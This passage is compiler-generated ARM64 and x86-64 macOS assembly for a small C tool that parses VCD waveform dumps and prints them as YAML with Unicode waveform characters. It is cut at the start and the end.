l_.str.32@PAGE add x0, x0, l_.str.32@PAGEOFF bl _printf adrp x0, l_.str.33@PAGE add x0, x0, l_.str.33@PAGEOFF bl _printf ldur x8, [x29, #-8] mov x9, #61704 ldr s0, [x8, x9] fcvt d0, s0 mov x8, sp str d0, [x8] adrp x0, l_.str.34@PAGE add x0, x0, l_.str.34@PAGEOFF bl _printf ldur x8, [x29, #-8] mov x9, #61964 add x8, x8, x9 str x8, [sp, #72] ; 8-byte Folded Spill subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB6_12 b LBB6_11 LBB6_11: ldr x8, [sp, #72] ; 8-byte Folded Reload str x8, [sp, #64] ; 8-byte Folded Spill b LBB6_13 LBB6_12: adrp x8, l_.str.36@PAGE add x8, x8, l_.str.36@PAGEOFF str x8, [sp, #64] ; 8-byte Folded Spill b LBB6_13 LBB6_13: ldr x8, [sp, #64] ; 8-byte Folded Reload mov x9, sp str x8, [x9] adrp x0, l_.str.35@PAGE add x0, x0, l_.str.35@PAGEOFF bl _printf ldur x8, [x29, #-8] mov x9, #62100 ldr w8, [x8, x9] ; implicit-def: $x10 mov x10, x8 ldur x8, [x29, #-16] ldr x8, [x8, #32] mov x9, sp str x10, [x9] adrp x10, l_.str.38@PAGE add x10, x10, l_.str.38@PAGEOFF str x10, [x9, #8] str x8, [x9, #16] adrp x0, l_.str.37@PAGE add x0, x0, l_.str.37@PAGEOFF bl _printf ldur x8, [x29, #-16] ldr s1, [x8, #48] ; implicit-def: $d0 fmov s0, s1 ucvtf d0, d0 stur d0, [x29, #-32] b LBB6_14 LBB6_14: ; =>This Inner Loop Header: Depth=1 ldur d0, [x29, #-32] ldur x8, [x29, #-8] mov x9, #61696 ldr s2, [x8, x9] ; implicit-def: $d1 fmov s1, s2 ucvtf d1, d1 fcmp d0, d1 cset w8, pl tbnz w8, #0, LBB6_17 b LBB6_15 LBB6_15: ; in Loop: Header=BB6_14 Depth=1 ldur w9, [x29, #-20] mov w8, #10 mul w8, w8, w9 subs w10, w8, #1 ldur d0, [x29, #-32] ldur x8, [x29, #-8] mov x9, #61704 ldr s1, [x8, x9] fcvt d1, s1 fmul d0, d0, d1 mov x8, sp ; implicit-def: $x9 mov x9, x10 str x9, [x8] str d0, [x8, #8] adrp x0, l_.str.39@PAGE add x0, x0, l_.str.39@PAGEOFF bl _printf b LBB6_16 LBB6_16: ; in Loop: Header=BB6_14 Depth=1 ldur d0, [x29, #-32] fmov d1, #10.00000000 fadd d0, d0, d1 stur d0, [x29, #-32] b LBB6_14 LBB6_17: ldur x8, [x29, #-16] ldr x8, [x8, #40] mov x9, sp str x8, [x9] adrp x0, l_.str.40@PAGE add x0, x0, l_.str.40@PAGEOFF bl _printf ldur x8, [x29, #-8] stur x8, [x29, #-40] b LBB6_18 LBB6_18: ; =>This Loop Header: Depth=1 ; Child Loop BB6_28 Depth 2 ; Child Loop BB6_36 Depth 3 ldur x8, [x29, #-40] ldur x9, [x29, #-8] subs x8, x8, x9 mov x9, #144 sdiv x8, x8, x9 subs x8, x8, #400 cset w8, hs tbnz w8, #0, LBB6_58 b LBB6_19 LBB6_19: ; in Loop: Header=BB6_18 Depth=1 ldur x8, [x29, #-40] ldr w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB6_21 b LBB6_20 LBB6_20: ; in Loop: Header=BB6_18 Depth=1 b LBB6_57 LBB6_21: ; in Loop: Header=BB6_18 Depth=1 ldur x8, [x29, #-40] ldur x9, [x29, #-8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB6_23 b LBB6_22 LBB6_22: ; in Loop: Header=BB6_18 Depth=1 ldur x8, [x29, #-40] ldr w8, [x8, #4] ldur x9, [x29, #-40] ldur w9, [x9, #-140] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB6_27 b LBB6_23 LBB6_23: ; in Loop: Header=BB6_18 Depth=1 ldur x8, [x29, #-40] ldr w8, [x8, #4] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB6_25 b LBB6_24 LBB6_24: ; in Loop: Header=BB6_18 Depth=1 ldur x8, [x29, #-8] mov x9, #57600 add x8, x8, x9 ldur x9, [x29, #-40] ldr w9, [x9, #4] ; kill: def $x9 killed $w9 add x8, x8, x9, lsl #7 str x8, [sp, #56] ; 8-byte Folded Spill b LBB6_26 LBB6_25: ; in Loop: Header=BB6_18 Depth=1 adrp x8, l_.str.42@PAGE add x8, x8, l_.str.42@PAGEOFF str x8, [sp, #56] ; 8-byte Folded Spill b LBB6_26 LBB6_26: ; in Loop: Header=BB6_18 Depth=1 ldr x8, [sp, #56] ; 8-byte Folded Reload mov x9, sp str x8, [x9] adrp x0, l_.str.41@PAGE add x0, x0, l_.str.41@PAGEOFF bl _printf b LBB6_27 LBB6_27: ; in Loop: Header=BB6_18 Depth=1 ldur x8, [x29, #-8] mov x9, #62100 ldr w8, [x8, x9] ; implicit-def: $x11 mov x11, x8 ldur x8, [x29, #-40] add x10, x8, #8 ldur x8, [x29, #-16] ldr x8, [x8, #32] mov x9, sp str x11, [x9] str x10, [x9, #8] str x8, [x9, #16] adrp x0, l_.str.37@PAGE add x0, x0, l_.str.37@PAGEOFF bl _printf ldur x8, [x29, #-40] ldr x8, [x8, #136] ldur x9, [x29, #-16] ldr w9, [x9, #48] ; kill: def $x9 killed $w9 add x8, x8, x9, lsl #3 stur x8, [x29, #-48] b LBB6_28 LBB6_28: ; Parent Loop BB6_18 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB6_36 Depth 3 ldur x8, [x29, #-48] ldur x9, [x29, #-40] ldr x9, [x9, #136] ldur x10, [x29, #-8] mov x11, #61696 ldr w10, [x10, x11] ; kill: def $x10 killed $w10 add x9, x9, x10, lsl #3 subs x8, x8, x9 cset w8, hs tbnz w8, #0, LBB6_56 b LBB6_29 LBB6_29: ; in Loop: Header=BB6_28 Depth=2 ldur x8, [x29, #-48] ldur x9, [x29, #-40] ldr x9, [x9, #136] subs x8, x8, x9 cset w8, ls tbnz w8, #0, LBB6_31 b LBB6_30 LBB6_30: ; in Loop: Header=BB6_28 Depth=2 ldur x8, [x29, #-48] subs x8, x8, #8 str x8, [sp, #48] ; 8-byte Folded Spill b LBB6_32 LBB6_31: ; in Loop: Header=BB6_28 Depth=2 ldur x8, [x29, #-48] str x8, [sp, #48] ; 8-byte Folded Spill b LBB6_32 LBB6_32: ; in Loop: Header=BB6_28 Depth=2 ldr x8, [sp, #48] ; 8-byte Folded Reload stur x8, [x29, #-56] ldur x8, [x29, #-48] ldrb w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB6_34 b LBB6_33 LBB6_33: ; in Loop: Header=BB6_28 Depth=2 ldur w9, [x29, #-20] ; implicit-def: $x8 mov x8, x9 ldur x9, [x29, #-48] ldrsb w10, [x9] mov x9, sp str x8, [x9] ; implicit-def: $x8 mov x8, x10 str x8, [x9, #8] adrp x0, l_.str.43@PAGE add x0, x0, l_.str.43@PAGEOFF bl _printf b LBB6_54 LBB6_34: ; in Loop: Header=BB6_28 Depth=2 ldur x8, [x29, #-40] ldr w8, [x8] subs w8, w8, #1 cset w8, ne tbnz w8, #0, LBB6_52 b LBB6_35 LBB6_35: ; in Loop: Header=BB6_28 Depth=2 stur wzr, [x29, #-60] b LBB6_36 LBB6_36: ; Parent Loop BB6_18 Depth=1 ; Parent Loop BB6_28 Depth=2 ; => This Inner Loop Header: Depth=3 ldur w8, [x29, #-60] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB6_51 b LBB6_37 LBB6_37: ; in Loop: Header=BB6_36 Depth=3 ldur w8, [x29, #-60] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB6_45 b LBB6_38 LBB6_38: ; in Loop: Header=BB6_36 Depth=3 ldur w8, [x29, #-24] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB6_45 b LBB6_39 LBB6_39: ; in Loop: Header=BB6_36 Depth=3 ldur x8, [x29, #-48] ldrsb w8, [x8] ldur x9, [x29, #-56] ldrsb w9, [x9] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB6_45 b LBB6_40 LBB6_40: ; in Loop: Header=BB6_36 Depth=3 ldur x8, [x29, #-48] ldr w8, [x8, #4] ldur x9, [x29, #-56] ldr w9, [x9, #4] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB6_45 b LBB6_41 LBB6_41: ; in Loop: Header=BB6_36 Depth=3 ldur x8, [x29, #-56] ldr w8, [x8, #4] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB6_43 b LBB6_42 LBB6_42: ; in Loop: Header=BB6_36 Depth=3 ldur x8, [x29, #-16] ldr x8, [x8, #24] str x8, [sp, #40] ; 8-byte Folded Spill b LBB6_44 LBB6_43: ; in Loop: Header=BB6_36 Depth=3 ldur x8, [x29, #-16] ldr x8, [x8, #8] str x8, [sp, #40] ; 8-byte Folded Spill b LBB6_44 LBB6_44: ; in Loop: Header=BB6_36 Depth=3 ldr x8, [sp, #40] ; 8-byte Folded Reload mov x9, sp str x8, [x9] adrp x0, l_.str.44@PAGE add x0, x0, l_.str.44@PAGEOFF bl _printf b LBB6_49 LBB6_45: ; in Loop: Header=BB6_36 Depth=3 ldur x8, [x29, #-48] ldr w8, [x8, #4] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB6_47 b LBB6_46 LBB6_46: ; in Loop: Header=BB6_36 Depth=3 ldur x8, [x29, #-16] ldr x8, [x8, #16] str x8, [sp, #32] ; 8-byte Folded Spill b LBB6_48 LBB6_47: ; in Loop: Header=BB6_36 Depth=3 ldur x8, [x29, #-16] ldr x8, [x8] str x8, [sp, #32] ; 8-byte Folded Spill b LBB6_48 LBB6_48: ; in Loop: Header=BB6_36 Depth=3 ldr x8, [sp, #32] ; 8-byte Folded Reload mov x9, sp str x8, [x9] adrp x0, l_.str.44@PAGE add x0, x0, l_.str.44@PAGEOFF bl _printf b LBB6_49 LBB6_49: ; in Loop: Header=BB6_36 Depth=3 b LBB6_50 LBB6_50: ; in Loop: Header=BB6_36 Depth=3 ldur w8, [x29, #-60] add w8, w8, #1 stur w8, [x29, #-60] b LBB6_36 LBB6_51: ; in Loop: Header=BB6_28 Depth=2 b LBB6_53 LBB6_52: ; in Loop: Header=BB6_28 Depth=2 ldur w8, [x29, #-20] ; implicit-def: $x10 mov x10, x8 ldur x8, [x29, #-48] ldr w9, [x8, #4] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.45@PAGE add x0, x0, l_.str.45@PAGEOFF bl _printf b LBB6_53 LBB6_53: ; in Loop: Header=BB6_28 Depth=2 b LBB6_54 LBB6_54: ; in Loop: Header=BB6_28 Depth=2 b LBB6_55 LBB6_55: ; in Loop: Header=BB6_28 Depth=2 ldur x8, [x29, #-48] add x8, x8, #8 stur x8, [x29, #-48] b LBB6_28 LBB6_56: ; in Loop: Header=BB6_18 Depth=1 ldur x8, [x29, #-16] ldr x8, [x8, #40] mov x9, sp str x8, [x9] adrp x0, l_.str.46@PAGE add x0, x0, l_.str.46@PAGEOFF bl _printf b LBB6_57 LBB6_57: ; in Loop: Header=BB6_18 Depth=1 ldur x8, [x29, #-40] add x8, x8, #144 stur x8, [x29, #-40] b LBB6_18 LBB6_58: ldp x29, x30, [sp, #160] ; 16-byte Folded Reload add sp, sp, #176 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 mov w9, #62320 adrp x16, ___chkstk_darwin@GOTPAGE ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF] blr x16 sub sp, sp, #15, lsl #12 ; =61440 sub sp, sp, #880 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str wzr, [sp, #196] str w0, [sp, #192] str x1, [sp, #184] adrp x0, l_.str.47@PAGE add x0, x0, l_.str.47@PAGEOFF bl _getenv str x0, [sp, #120] ; 8-byte Folded Spill subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB7_2 b LBB7_1 LBB7_1: ldr x8, [sp, #120] ; 8-byte Folded Reload str x8, [sp, #112] ; 8-byte Folded Spill b LBB7_3 LBB7_2: adrp x8, l_.str.48@PAGE add x8, x8, l_.str.48@PAGEOFF str x8, [sp, #112] ; 8-byte Folded Spill b LBB7_3 LBB7_3: ldr x8, [sp, #112] ; 8-byte Folded Reload str x8, [sp, #128] adrp x0, l_.str.49@PAGE add x0, x0, l_.str.49@PAGEOFF bl _getenv str x0, [sp, #104] ; 8-byte Folded Spill subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB7_5 b LBB7_4 LBB7_4: ldr x8, [sp, #104] ; 8-byte Folded Reload str x8, [sp, #96] ; 8-byte Folded Spill b LBB7_6 LBB7_5: adrp x8, l_.str.50@PAGE add x8, x8, l_.str.50@PAGEOFF str x8, [sp, #96] ; 8-byte Folded Spill b LBB7_6 LBB7_6: ldr x8, [sp, #96] ; 8-byte Folded Reload str x8, [sp, #136] adrp x0, l_.str.51@PAGE add x0, x0, l_.str.51@PAGEOFF bl _getenv str x0, [sp, #88] ; 8-byte Folded Spill subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB7_8 b LBB7_7 LBB7_7: ldr x8, [sp, #88] ; 8-byte Folded Reload str x8, [sp, #80] ; 8-byte Folded Spill b LBB7_9 LBB7_8: adrp x8, l_.str.52@PAGE add x8, x8, l_.str.52@PAGEOFF str x8, [sp, #80] ; 8-byte Folded Spill b LBB7_9 LBB7_9: ldr x8, [sp, #80] ; 8-byte Folded Reload str x8, [sp, #144] adrp x0, l_.str.53@PAGE add x0, x0, l_.str.53@PAGEOFF bl _getenv str x0, [sp, #72] ; 8-byte Folded Spill subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB7_11 b LBB7_10 LBB7_10: ldr x8, [sp, #72] ; 8-byte Folded Reload str x8, [sp, #64] ; 8-byte Folded Spill b LBB7_12 LBB7_11: adrp x8, l_.str.54@PAGE add x8, x8, l_.str.54@PAGEOFF str x8, [sp, #64] ; 8-byte Folded Spill b LBB7_12 LBB7_12: ldr x8, [sp, #64] ; 8-byte Folded Reload str x8, [sp, #152] adrp x0, l_.str.55@PAGE add x0, x0, l_.str.55@PAGEOFF bl _getenv str x0, [sp, #56] ; 8-byte Folded Spill subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB7_14 b LBB7_13 LBB7_13: ldr x8, [sp, #56] ; 8-byte Folded Reload str x8, [sp, #48] ; 8-byte Folded Spill b LBB7_15 LBB7_14: adrp x8, l_.str.56@PAGE add x8, x8, l_.str.56@PAGEOFF str x8, [sp, #48] ; 8-byte Folded Spill b LBB7_15 LBB7_15: ldr x8, [sp, #48] ; 8-byte Folded Reload str x8, [sp, #160] adrp x0, l_.str.57@PAGE add x0, x0, l_.str.57@PAGEOFF bl _getenv str x0, [sp, #40] ; 8-byte Folded Spill subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB7_17 b LBB7_16 LBB7_16: ldr x8, [sp, #40] ; 8-byte Folded Reload str x8, [sp, #32] ; 8-byte Folded Spill b LBB7_18 LBB7_17: adrp x8, l_.str.56@PAGE add x8, x8, l_.str.56@PAGEOFF str x8, [sp, #32] ; 8-byte Folded Spill b LBB7_18 LBB7_18: ldr x8, [sp, #32] ; 8-byte Folded Reload str x8, [sp, #168] adrp x0, l_.str.58@PAGE add x0, x0, l_.str.58@PAGEOFF bl _getenv str x0, [sp, #24] ; 8-byte Folded Spill subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB7_20 b LBB7_19 LBB7_19: ldr x8, [sp, #24] ; 8-byte Folded Reload str x8, [sp, #16] ; 8-byte Folded Spill b LBB7_21 LBB7_20: adrp x8, l_.str.59@PAGE add x8, x8, l_.str.59@PAGEOFF str x8, [sp, #16] ; 8-byte Folded Spill b LBB7_21 LBB7_21: ldr x0, [sp, #16] ; 8-byte Folded Reload bl _atoi str w0, [sp, #176] add x0, sp, #200 str x0, [sp, #8] ; 8-byte Folded Spill mov x1, #62112 bl _bzero ldr x0, [sp, #8] ; 8-byte Folded Reload bl _parseVcd ldr x0, [sp, #8] ; 8-byte Folded Reload add x1, sp, #128 bl _printYml ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB7_23 b LBB7_22 LBB7_22: bl ___stack_chk_fail LBB7_23: mov w0, #0 add sp, sp, #15, lsl #12 ; =61440 add sp, sp, #880 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload ldp x28, x27, [sp], #32 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Fatal error. Send your VCD at https://github.com/yne/vcd/issue\nReason: MAX_CHANNEL reached (400), rebuild with -DMAX_CHANNEL=...\n" l_.str.1: ; @.str.1 .asciz "%127s" l_.str.2: ; @.str.2 .asciz "var" l_.str.3: ; @.str.3 .asciz " %*s %d %127[^ ] %127[^$]" l_.str.4: ; @.str.4 .asciz "scope" l_.str.5: ; @.str.5 .asciz "Fatal error. Send your VCD at https://github.com/yne/vcd/issue\nReason: MAX_SCOPE reached (32), rebuild with -DMAX_SCOPE=...\n" l_.str.6: ; @.str.6 .asciz "%*s %127[^ $]" l_.str.7: ; @.str.7 .asciz "date" l_.str.8: ; @.str.8 .asciz "\n%127[^$\n]" l_.str.9: ; @.str.9 .asciz "version" l_.str.10: ; @.str.10 .asciz "timescale" l_.str.11: ; @.str.11 .asciz "\n%f%127[^$\n]" l_.str.12: ; @.str.12 .asciz "comment" l_.str.13: ; @.str.13 .asciz "\n%*[^$]" l_.str.14: ; @.str.14 .asciz "upscope" l_.str.15: ; @.str.15 .asciz "enddefinitions" l_.str.16: ; @.str.16 .asciz "dumpvars" l_.str.17: ; @.str.17 .asciz "end" l_.str.18: ; @.str.18 .asciz "unknow token : %s\n" l_.str.19: ; @.str.19 .asciz "%llu" l_.str.20: ; @.str.20 .asciz "0123456789zZxXbU-" l_.str.21: ; @.str.21 .asciz "Fatal error. Send your VCD at https://github.com/yne/vcd/issue\nReason: Unknown sample value: %c" l_.str.22: ; @.str.22 .asciz "%127[^ \n]" l_.str.23: ; @.str.23 .asciz "Fatal error. Send your VCD at https://github.com/yne/vcd/issue\nReason: unknow char : %c\n" l_.str.24: ; @.str.24 .asciz "Fatal error. Send your VCD at https://github.com/yne/vcd/issue\nReason: high waveform length must be 1" l_.str.25: ; @.str.25 .asciz "Fatal error. Send your VCD at https://github.com/yne/vcd/issue\nReason: low waveform length must be 1" l_.str.26: ; @.str.26 .asciz "Fatal error. Send your VCD at https://github.com/yne/vcd/issue\nReason: drown waveform length must be 1 or empty" l_.str.27: ; @.str.27 .asciz "Fatal error. Send your VCD at https://github.com/yne/vcd/issue\nReason: raise waveform length must be 1 or empty" l_.str.28: ; @.str.28 .asciz "global:\n" l_.str.29: ; @.str.29 .asciz " zoom: %i\n" l_.str.30: ; @.str.30 .asciz " date: %s\n" l_.str.31: ; @.str.31 .asciz " total: %i\n" l_.str.32: ; @.str.32 .asciz " skip: %i\n" l_.str.33: ; @.str.33 .asciz " time:\n" l_.str.34: ; @.str.34 .asciz " scale: %.2f\n" l_.str.35: ; @.str.35 .asciz " unit: %s\n" l_.str.36: ; @.str.36 .asciz "?" l_.str.37: ; @.str.37 .asciz " %-*s: %s" l_.str.38: ; @.str.38 .asciz "line" l_.str.39: ; @.str.39 .asciz "%-*g " l_.str.40: ; @.str.40 .asciz "%s\nchannels:\n" l_.str.41: ; @.str.41 .asciz " %s:\n" l_.str.42: ; @.str.42 .asciz "default" l_.str.43: ; @.str.43 .asciz "%-*c" l_.str.44: ; @.str.44 .asciz "%s" l_.str.45: ; @.str.45 .asciz "%-*X" l_.str.46: ; @.str.46 .asciz "%s\n" l_.str.47: ; @.str.47 .asciz "LOW" l_.str.48: ; @.str.48 .asciz "\342\226\201" l_.str.49: ; @.str.49 .asciz "RAISE" l_.str.50: ; @.str.50 .asciz "\342\225\261" l_.str.51: ; @.str.51 .asciz "HIGH" l_.str.52: ; @.str.52 .asciz "\342\226\224" l_.str.53: ; @.str.53 .asciz "DROWN" l_.str.54: ; @.str.54 .asciz "\342\225\262" l_.str.55: ; @.str.55 .asciz "STX" l_.str.56: ; @.str.56 .asciz "\"" l_.str.57: ; @.str.57 .asciz "ETX" l_.str.58: ; @.str.58 .asciz "SKIP" l_.str.59: ; @.str.59 .asciz "0" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _chanId ## -- Begin function chanId .p2align 4, 0x90 _chanId: ## @chanId .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq $0, -16(%rbp) movq -8(%rbp), %rdi callq _strlen movq %rax, -24(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 cmpq $1, -24(%rbp) jb LBB0_4 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 imulq $94, -16(%rbp), %rax movq -8(%rbp), %rcx movq -24(%rbp), %rdx subq $1, %rdx movsbq (%rcx,%rdx), %rcx addq %rcx, %rax subq $33, %rax movq %rax, -16(%rbp) ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movq -24(%rbp), %rax addq $-1, %rax movq %rax, -24(%rbp) jmp LBB0_1 LBB0_4: cmpq $400, -16(%rbp) ## imm = 0x190 jbe LBB0_6 ## %bb.5: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl %eax, %edi callq _exit LBB0_6: movq -16(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _unilen ## -- Begin function unilen .p2align 4, 0x90 _unilen: ## @unilen .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq $0, -16(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movq -8(%rbp), %rax cmpb $0, (%rax) je LBB1_4 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movq -8(%rbp), %rax movsbl (%rax), %eax andl $192, %eax cmpl $128, %eax setne %al andb $1, %al movzbl %al, %eax cltq addq -16(%rbp), %rax movq %rax, -16(%rbp) ## %bb.3: ## in Loop: Header=BB1_1 Depth=1 movq -8(%rbp), %rax addq $1, %rax movq %rax, -8(%rbp) jmp LBB1_1 LBB1_4: movq -16(%rbp), %rax popq %rbp retq .cfi_endproc ## -- End function .globl _parseVcdInstruction ## -- Begin function parseVcdInstruction .p2align 4, 0x90 _parseVcdInstruction: ## @parseVcdInstruction .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $480, %rsp ## imm = 0x1E0 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -424(%rbp) leaq -144(%rbp), %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _scanf leaq -144(%rbp), %rsi leaq L_.str.2(%rip), %rdi callq _strcmp cmpl $0, %eax jne LBB2_8 ## %bb.1: leaq -416(%rbp), %rdi xorl %esi, %esi movl $144, %edx callq _memset movq -424(%rbp), %rax movl 62092(%rax), %eax movl %eax, -412(%rbp) movl $8, %edi callq _malloc movq %rax, -280(%rbp) leaq -416(%rbp), %rsi leaq -272(%rbp), %rdx leaq -416(%rbp), %rcx addq $8, %rcx leaq L_.str.3(%rip), %rdi movb $0, %al callq _scanf movq -424(%rbp), %rax movl 62100(%rax), %eax ## kill: def $rax killed $eax movq %rax, -432(%rbp) ## 8-byte Spill leaq -416(%rbp), %rdi addq $8, %rdi callq _strlen movq %rax, %rcx movq -432(%rbp), %rax ## 8-byte Reload cmpq %rcx, %rax jbe LBB2_3 ## %bb.2: movq -424(%rbp), %rax movl 62100(%rax), %eax ## kill: def $rax killed $eax movq %rax, -440(%rbp) ## 8-byte Spill jmp LBB2_4 LBB2_3: leaq -416(%rbp), %rdi addq $8, %rdi callq _strlen movq %rax, -440(%rbp) ## 8-byte Spill LBB2_4: movq -440(%rbp), %rax ## 8-byte Reload movl %eax, %ecx movq -424(%rbp), %rax movl %ecx, 62100(%rax) movq -424(%rbp), %rax movl 62104(%rax), %eax cmpl -416(%rbp), %eax jbe LBB2_6 ## %bb.5: movq -424(%rbp), %rax movl 62104(%rax), %eax movl %eax, -444(%rbp) ## 4-byte Spill jmp LBB2_7 LBB2_6: movl -416(%rbp), %eax movl %eax, -444(%rbp) ## 4-byte Spill LBB2_7: movl -444(%rbp), %ecx ## 4-byte Reload movq -424(%rbp), %rax movl %ecx, 62104(%rax) movq -424(%rbp), %rax movq %rax, -456(%rbp) ## 8-byte Spill leaq -272(%rbp), %rdi callq _chanId movq -456(%rbp), %rdi ## 8-byte Reload imulq $144, %rax, %rax addq %rax, %rdi leaq -416(%rbp), %rsi movl $144, %edx callq _memcpy jmp LBB2_41 LBB2_8: leaq -144(%rbp), %rsi leaq L_.str.4(%rip), %rdi callq _strcmp cmpl $0, %eax jne LBB2_15 ## %bb.9: movq -424(%rbp), %rax movl 61700(%rax), %ecx addl $1, %ecx movl %ecx, 61700(%rax) movq -424(%rbp), %rax cmpl $32, 61700(%rax) jne LBB2_11 ## %bb.10: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.5(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl %eax, %edi callq _exit LBB2_11: movq -424(%rbp), %rax movl 61700(%rax), %ecx movq -424(%rbp), %rax movl %ecx, 62092(%rax) movq -424(%rbp), %rsi addq $57600, %rsi ## imm = 0xE100 movq -424(%rbp), %rax movl 62092(%rax), %eax ## kill: def $rax killed $eax shlq $7, %rax addq %rax, %rsi leaq L_.str.6(%rip), %rdi movb $0, %al callq _scanf movq -424(%rbp), %rax movl 62096(%rax), %eax ## kill: def $rax killed $eax movq %rax, -464(%rbp) ## 8-byte Spill movq -424(%rbp), %rdi addq $57600, %rdi ## imm = 0xE100 movq -424(%rbp), %rax movl 62092(%rax), %eax ## kill: def $rax killed $eax shlq $7, %rax addq %rax, %rdi callq _strlen movq %rax, %rcx movq -464(%rbp), %rax ## 8-byte Reload cmpq %rcx, %rax jbe LBB2_13 ## %bb.12: movq -424(%rbp), %rax movl 62096(%rax), %eax ## kill: def $rax killed $eax movq %rax, -472(%rbp) ## 8-byte Spill jmp LBB2_14 LBB2_13: movq -424(%rbp), %rdi addq $57600, %rdi ## imm = 0xE100 movq -424(%rbp), %rax movl 62092(%rax), %eax ## kill: def $rax killed $eax shlq $7, %rax addq %rax, %rdi callq _strlen movq %rax, -472(%rbp) ## 8-byte Spill LBB2_14: movq -472(%rbp), %rax ## 8-byte Reload movl %eax, %ecx movq -424(%rbp), %rax movl %ecx, 62096(%rax) jmp LBB2_40 LBB2_15: leaq -144(%rbp), %rsi leaq L_.str.7(%rip), %rdi callq _strcmp cmpl $0, %eax jne LBB2_17 ## %bb.16: movq -424(%rbp), %rsi addq $61708, %rsi ## imm = 0xF10C leaq L_.str.8(%rip), %rdi movb $0, %al callq _scanf jmp LBB2_39 LBB2_17: leaq -144(%rbp), %rsi leaq L_.str.9(%rip), %rdi callq _strcmp cmpl $0, %eax jne LBB2_19 ## %bb.18: movq -424(%rbp), %rsi addq $61836, %rsi ## imm = 0xF18C leaq L_.str.8(%rip), %rdi movb $0, %al callq _scanf jmp LBB2_38 LBB2_19: leaq -144(%rbp), %rsi leaq L_.str.10(%rip), %rdi callq _strcmp cmpl $0, %eax jne LBB2_21 ## %bb.20: movq -424(%rbp), %rsi addq $61704, %rsi ## imm = 0xF108 movq -424(%rbp), %rdx addq $61964, %rdx ## imm = 0xF20C leaq L_.str.11(%rip), %rdi movb $0, %al callq _scanf jmp LBB2_37 LBB2_21: leaq -144(%rbp), %rsi leaq L_.str.12(%rip), %rdi callq _strcmp cmpl $0, %eax jne LBB2_23 ## %bb.22: leaq L_.str.13(%rip), %rdi movb $0, %al callq _scanf jmp LBB2_36 LBB2_23: leaq -144(%rbp), %rsi leaq L_.str.14(%rip), %rdi callq _strcmp cmpl $0, %eax jne LBB2_25 ## %bb.24: leaq L_.str.13(%rip), %rdi movb $0, %al callq _scanf movq -424(%rbp), %rax movl $0, 62092(%rax) jmp LBB2_35 LBB2_25: leaq -144(%rbp), %rsi leaq L_.str.15(%rip), %rdi callq _strcmp cmpl $0, %eax jne LBB2_27 ## %bb.26: leaq L_.str.13(%rip), %rdi movb $0, %al callq _scanf jmp LBB2_34 LBB2_27: leaq -144(%rbp), %rsi leaq L_.str.16(%rip), %rdi callq _strcmp cmpl $0, %eax jne LBB2_29 ## %bb.28: jmp LBB2_33 LBB2_29: leaq -144(%rbp), %rsi leaq L_.str.17(%rip), %rdi callq _strcmp cmpl $0, %eax jne LBB2_31 ## 